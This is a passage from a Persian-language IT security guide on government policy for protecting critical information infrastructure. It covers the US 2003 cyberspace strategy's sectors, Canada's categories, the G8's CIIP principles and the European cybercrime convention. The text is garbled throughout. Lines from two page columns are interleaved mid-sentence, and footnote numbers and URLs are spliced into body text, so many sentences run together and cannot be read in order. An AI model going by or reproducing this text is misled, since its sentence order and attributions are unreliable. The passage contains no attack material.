ﺻﺤﻴﺢ ﭼﺮﺍﻏﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻳﻲ ،ﺑﺎﺯ ﻭ ﺑﺴﺘﻪ ﻛﺮﺩﻥ ﭘﻠﻬﺎ ،ﺭﺍﻩﺍﻧﺪﺍﺧﺘﻦ ﭼﺎﺭﭼﻮﺏ ﻋﻤﻠﻜـﺮﺩ ﻭﺳـﻴﻌﺘﺮ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ
٩
ﻗﻄﺎﺭﻫﺎ ﻭ ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴـﻚ ﻫـﻮﺍﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺑـﻪ ﻋﻤﻠﻜـﺮﺩ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻭﺍﮔﺬﺍﺭ ﻣﻲﻛﻨﺪ.
ﺻﺤﻴﺢ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﻧﺪ.
ﻫﻴﭻ ﺗﻌﺮﻳﻒ ﻣﺸﺨﺼﻲ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬـﺎﻱ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ
ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻭ ﻓﻬﺮﺳــﺖ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﻛــﻪ ﺗﻮﺳــﻂ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻭ ﺍﺯ 5 Consumer Protection
6 Data & Communications Privacy
7 Intellectual Property Rights
8 E-Commerce Framework
ﺩﺭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻭﻟﻴﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﻳﻚ ﺑﺨﺶ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﻃﻴـﻒ ٩
10 E-Security
11 Critical Infrastructures ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑﺮ ﺗﻮﺳﻌﺔ ICTﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
٢٣٣ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺯ ﺟﻤﻠـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ ١٥ﻭ ﺯﻣﺎﻧﻲ ﺗﺎ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ .ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺗﺎ ﺣﺪﻭﺩﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﺓ ﺁﻣﺮﻳﻜﺎ ﻛﻪ ﺩﺭ ﻓﻮﺭﻳﻪ ﺳﺎﻝ ۲۰۰۳ﺑﻪ ﭼـﺎﭖ
ﻲ ﻣﻮﺟﻮﺩ ﺑﻜﺎﺭ ﺭﻭﺩ. ﺩﺭ ﻣﺤﺪﻭﺩﻩ ﻣﺆﺳﺴﺎﺕ ﻭ ﺧﻄﻮﻁ ﺗﻮﻟﻴﺪ ﺻﻨﻌﺘ ﹺ ﺭﺳــﻴﺪ ۱۳ ،ﮔــﺮﻭﻩ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﺭﺍ ﻣــﺸﺨﺺ ﻣــﻲﺳــﺎﺯﺩ:
ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ ﺩﺭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺷﺎﻣﻞ ﺍﺗﺤﺎﺩﻳﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ، (۱ﻛﺸـــﺎﻭﺭﺯﻱ (۲ ،ﺗﻐـــﺬﻳﻪ (۳ ،ﺁﺏ (۴ ،ﺑﻬﺪﺍﺷـﺖ ﻋﻤـﻮﻣﻲ،
ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ ﺳـﺎﻳﺮ ﺷـﺮﻛﺘﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺻـﻨﺎﻳﻊ (۵ﺧـــﺪﻣﺎﺕ ﺍﺿـــﻄﺮﺍﺭﻱ (۶ ،ﺩﻭﻟـــﺖ (۷ ،ﺻـــﻨﺎﻳﻊ ﺩﻓـــﺎﻋﻲ،
ﻣﺨﺘﻠﻒ ﻣﻲ ﺑﺎﺷﻨﺪ .ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ (۸ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻩ ﺩﻭﺭ (۹ ،ﺍﻧﺮﮊﻱ (۱۰ ،ﺣﻤﻞ ﻭ ﻧﻘـﻞ،
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈـﺎﺭﺗﻲ (۱۱ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺍﻣﻮﺭ ﻣﺎﻟﻲ (۱۲ ،ﻣـﻮﺍﺩ ﺷـﻴﻤﻴﺎﻳﻲ ﻭ ﭘﺮﺧﻄـﺮ ،ﻭ
ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ) .ﻣﺜﻞ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺳـﻨﺘﻲ ﺑﺎﻧﻜـﺪﺍﺭﻱ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ (۱۳ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﻭ ﻛﺸﺘﻴﺮﺍﻧﻲ ١٢.ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ
ﺩﻭﺭ ﻭ ﺑﺨﺸﻬﺎﻱ ﺍﻧﺮﮊﻱ ﺭﺍ ﻗﺎﻧﻮﻧﻤﻨﺪ ﻛﺮﺩﻩﺍﻧﺪ(. ﺷﺪﻩ ،ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﺎﻧـﺎﺩﺍ ﺗﻨﻬـﺎ ﺍﺯ
ﺷﺶ ﮔﺮﻭﻩ ﻧﺎﻡ ﻣﻲﺑﺮﺩ (۱ :ﺍﺭﺗﺒﺎﻃـﺎﺕ (۲ ،ﺩﻭﻟـﺖ (۳ ،ﺍﻧـﺮﮊﻱ ﻭ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﭘﻴﺸﻘﺪﻡ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ
ﺻﻨﺎﻳﻊ ﻫﻤﮕﺎﻧﻲ (۴ ،ﺧﺪﻣﺎﺕ )ﻛـﻪ ﺩﺭ ﻛﺎﻧـﺎﺩﺍ ﺷـﺎﻣﻞ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ،
ﻛﻪ ﺩﺭ ﻣﻘﻴﺎﺱ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻨـﺪ. ١٣
ﺗﻮﺯﻳﻊ ﻏﺬﺍ ،ﻭ ﺑﻬﺪﺍﺷـﺖ ﺍﺳـﺖ( (۵ ،ﺍﻣﻨﻴـﺖ ،ﻭ (۶ﺣﻤـﻞ ﻭ ﻧﻘـﻞ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﮔﺮﻭﻩ G8ﺩﺭ ﻣﺎﻩ ﻣـﻲ ﺳـﺎﻝ ۱۱ ، ۲۰۰۳ﺍﺻـﻞ ﺭﺍ
ﺗﻌﺮﻳﻒ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ ،ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺩﺭﻙ
ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﺗﻮﺳـﻌﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ ١٤
ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ،ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻧﻴﺴﺖ.
ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ١٦.ﺍﻳﻦ ﺍﺻـﻮﻝ
ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ: ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑـﻪ ﺩﻻﻳـﻞ ﺯﻳـﺎﺩﻱ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ
ﺍﺳﺖ .ﺍﻭﻝ ،ﺑﻪ ﺭﻭﺷﻦ ﺷﺪﻥ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛـﻪ ﭼـﺮﺍ
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪﺓ ﺍﺿـﻄﺮﺍﺭﻱ .۱
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﻢ ﺍﺳﺖ .ﺍﮔﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺩﺭﻙ ﻛﻨﻨـﺪ ﻛـﻪ
ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺣﻮﺍﺩﺙ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﺷﻨﺪ.
ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭘﻮﻝ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻏﻴـﺮ ﻗﺎﺑـﻞ ﭘﺮﺩﺍﺧـﺖ
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﺩﺍﻧﺶ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ ﺗـﺎ .۲ ﻣﻲﺷﻮﺩ ،ﻗﻄﺎﺭﻫﺎ ﻗﺎﺩﺭ ﺑﻪ ﺗﺮﻙ ﺍﻳﺴﺘﮕﺎﻩ ﻧﻤﻲﺑﺎﺷـﻨﺪ ﻭ ﺣﺘـﻲ ﺁﺏ
ﺑﻪ ﺩﺭﻙ ﺍﻓﺮﺍﺩ ﺍﺯ ﻣﺎﻫﻴﺖ ﻭ ﻭﺳﻌﺖ ﺯﻳﺮﺳـﺎﺧﺖ ﺍﻃﻼﻋـﺎﺕ ﺁﺷﺎﻣﻴﺪﻧﻲ ﭘﻤﭗ ﻧﺨﻮﺍﻫﺪ ﺷﺪ ،ﺁﻧﮕﺎﻩ ﺑﻬﺘﺮ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧـﺴﺖ ﺁﺛـﺎﺭ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺣﺴﺎﺱ ﺧﻮﺩ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ ﻭ ﻧﻘـﺶ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﻧﺎﺷــﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﻨــﺪ .ﺩﻭﻡ ،ﮔﺮﻭﻫﻬــﺎﻱ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ. ﺯﻳﺮﺳــﺎﺧﺘﻲ ﺑــﻪ ﺍﻳــﻦ ﺩﻟﻴــﻞ ﺍﻫﻤﻴــﺖ ﺩﺍﺭﻧــﺪ ﻛــﻪ ﺑــﻪ ﺗﻌﺮﻳــﻒ
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ ﻗـﺮﺍﺭ .۳ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺟﻮﺍﻣﻊ ﻛﻤـﻚ ﻣـﻲ ﻛﻨﻨـﺪ ﻭ ﺟـﻮﺍﻣﻌﻲ ﺑـﺎ ﻋﻼﻳـﻖ
ﺩﻫﻨﺪ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺘﻘﺎﺑﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﺳـﺎﺯﻧﺪ ﻭ ﻣﺸﺘﺮﻙ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ. ﺩﺍﺭﻧﺪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺻﻨﻌﺘﮕﺮﺍﻥ ﺻـﻨﻌﺖ ﺑـﺮﻕ ﻭ
ﻣﺴﺘﺸﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺸﺎﺭﻛﺖ ﻳﻜﺪﻳﮕﺮ ﻧﻘـﺶ ﻣﺜﺒﺘـﻲ
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﻣﺸﺎﺭﻛﺖ ﻣﻴـﺎﻥ ﺑﺨـﺶ ﻋﻤـﻮﻣﻲ ﻭ ﺑﺨـﺶ .۴
ﺩﺭ ﺭﻓﻊ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺮﻕ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ .ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺮﺳـﺎﺧﺘﻲ ﻣﻬـﻢ
ﺧــﻮﺩ ﺭﺍ ﻣــﻮﺭﺩ ﺗﺠﺰﻳــﻪ ﻭ ﺗﺤﻠﻴــﻞ ﻗــﺮﺍﺭ ﺩﻫﻨــﺪ ﻭ ﺁﻧﻬــﺎ ﺭﺍ
ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﺳﻴﺐﺩﻳﺪﻥ ﺁﻧﻬـﺎ ﺗـﺎ ﺣـﺪ 12 The National Strategy to Secure Cyberspace
ﺍﻣﻜﺎﻥ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨـﺪ ﻭ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﻩ ][U.S.
http://www.whitehouse.gov/pcipb
ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﺩﻫﻨﺪ. http://www.dhs.gov/interweb/assetlibrary/Natio
nal_Cyberspace_Strategy.pdf
13 & Office of Critical Infrastructure Protection
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺯﻣﺎﻥ .۵ ]Emergency Prepareness [Canada
http://www.ocipep.gc.ca/home/index_e.asp
ﺑﺤﺮﺍﻥ ﺍﻳﺠﺎﺩ ﻭ ﺍﺯ ﺁﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻛﻨﻨـﺪ ،ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﻣـﻮﺭﺩ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺰﺋﻴﺎﺕ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑـﻪ ﻣـﺴﺌﻠﻪ ۱۴
ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺯﻳﺮﺳـــﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـــﻲ ﻣـــﻲﺗﻮﺍﻧﻴـــﺪ ﺑـــﻪ ﻛﺘـــﺎﺏ
International Critical Information Infrastructure
Protection Handbookﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻣﺮﻛـﺰ
15 Best Practices
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: ۱۶ ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺪﺍﺧﻞ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﺩﻭﻟـﺖ ﺳـﻮﺋﻴﺲ
http://www.cybersecuritycooperation.org/docu ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ﺍﺳﺖ:
ments/G8_CIIP_Principles.pdf http://www.isn.ethz.ch/crn
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٣٤
ﺧﺼﻮﺻﻴﺖ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺍﺧﻠـﻲ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﺗﺎ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨـﺪ ﻛـﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ
ﻣﻴﺎﻥ ﺑﺨﺸﻬﺎ -ﺷﺎﻣﻞ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣـﺸﺎﺑﻪ ﻭ ﺍﺿــﻄﺮﺍﺭﻱ ﻫﻤﭽﻨــﺎﻥ ﺍﻣــﻦ ﻭ ﭘﺎﻳــﺪﺍﺭ ﺑــﺎﻗﻲ ﻣــﻲﻣﺎﻧﻨــﺪ ﻭ
ﻫﻤﺎﻧﻨﺪ -ﻭ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ﺍﺭﺗﺒـﺎﻃﻲ ﻣـﺸﺘﺮﻙ ﺍﺳـﺖ. ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﻨـﺪ ﻛـﻪ ﺿـﺎﻣﻦ
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ ﻛﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺭ ﺩﺳـﺘﺮﺱ .۶
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣـﺮﺗﺒﻂ
ﺑﻮﺩﻥ ﺩﺍﺩﻩ ،١٧ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺱ ﺭﺍ
ﺑﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺯﻳﺮﺳﺎﺧﺘﻲ ﺑﺎﺷﻨﺪ .ﻣﻲﺗـﻮﺍﻥ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺎ ﺍﻧﺘﺨـﺎﺏ
ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ.
ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻫﺒﺮﻱ ﺩﺭ ﺩﻭﻟﺖ ﺑـﺮﺍﻱ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ ﻣﺘﻤﺮﻛـﺰ
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻋﻤﻠـﻲ ﻛـﺮﺩ ﻭ ﻣـﺎ ﻧﻴـﺰ ﺩﺭ ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺭﺩﻳـﺎﺑﻲ ﺣﻤـﻼﺕ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻬـﻢ .۷
ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ. ﺍﻃﻼﻋــﺎﺗﻲ ﺭﺍ ﺗــﺴﻬﻴﻞ ﺑﺨــﺸﻴﺪﻩ ﻭ ﺩﺭ ﺯﻣــﺎﻥ ﻣﻨﺎﺳــﺐ،
ﺍﻃﻼﻋﺎﺕ ﺍﻳﻦ ﺭﺩﻳﺎﺑﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻘﺎﺿـﻲ
ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ.
ﻛــﺸﻮﺭﻫﺎ ﺑﺎﻳــﺪ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻓــﺰﺍﻳﺶ ﻗﺎﺑﻠﻴــﺖ ﻭﺍﻛــﻨﺶ، .۸
ﺁﻣﻮﺯﺷﻬﺎ ﻭ ﺗﻤﺮﻳﻨﺎﺗﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﺑﺮﺍﻱ ﭘﻴﺸﺎﻣﺪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭ ﺯﻣﺎﻥ ﻭﻗـﻮﻉ ﺣﻤﻠـﻪ ﻣـﻮﺭﺩ
ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﻭ ﻫﻤﮕـﺎﻥ ﺭﺍ ﻧﻴـﺰ ﺗـﺸﻮﻳﻖ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻧﺪ.
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻨﺪ ﻛﻪ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ .۹
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ،ﻗﻮﺍﻧﻴﻦ ﻣﻨﺎﺳﺐ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ
ﺩﺍﺭﻧﺪ ﻭ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺍ ﺑﺎ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﺑﻪ ﻧﺤﻮ ﺍﺣـﺴﻦ
ﻣﻄﺎﺑﻘــﺖ ﺩﻫﻨــﺪ -ﻣﺎﻧﻨــﺪ ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻛﻨﻮﺍﻧــﺴﻴﻮﻥ
ﺗﺨﻠﻔﺎﺕ ﺳﺎﻳﺒﺮ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ١٨ﺩﺭ ﻧـﻮﺍﻣﺒﺮ ﺳـﺎﻝ ۲۰۰۱
ﺗﺼﻮﻳﺐ ﺷﺪ ﻭ ﭘﺮﺳﻨﻞ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻱ ﺭﺍ ﺁﻣﺎﺩﺓ ﺍﺭﺯﻳﺎﺑﻲ ﻭ
ﺭﺩﻳﺎﺑﻲ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺱ ﻧﻤﻮﺩ.
.۱۰ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ
ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ﺭﺍ
